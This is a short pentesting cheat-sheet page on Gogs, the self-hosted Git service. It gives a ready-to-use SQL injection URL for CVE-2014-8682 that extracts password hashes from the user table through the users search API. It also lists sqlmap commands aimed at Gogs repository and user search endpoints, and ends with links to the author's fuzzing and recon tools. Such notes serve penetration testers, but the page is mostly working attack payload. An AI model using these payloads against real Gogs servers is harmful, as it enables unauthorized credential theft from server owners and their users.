Exploit Notes

Gogs Pentesting

Last modified: 2023-03-18

SQL Injection Web

Gogs (Go Git Service) is a painless self-hosted Git Service.

SQL injection (CVE-2014-8682)

http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

Automation

sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.